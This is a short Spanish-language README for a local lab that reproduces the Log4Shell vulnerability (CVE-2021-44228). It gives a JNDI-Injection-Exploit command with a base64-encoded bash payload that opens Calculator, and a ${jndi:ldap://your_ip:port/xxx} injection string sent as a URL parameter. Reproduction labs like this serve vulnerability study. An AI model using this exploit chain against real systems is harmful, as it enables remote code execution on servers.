
Entorno de reproducción de la vulnerabilidad CVE-2021-44228
Después de iniciar el proyecto, acceda a: http://127.0.0.1:9090/vul
Versión de JDK: java8u92 (evite usar versiones demasiado altas, se recomienda usar la misma que la mía, las versiones altas tienen ciertas restricciones sobre la inyección JNDI)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1
Use la herramienta anterior para generar el PAYLOAD.
Acceda a http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx}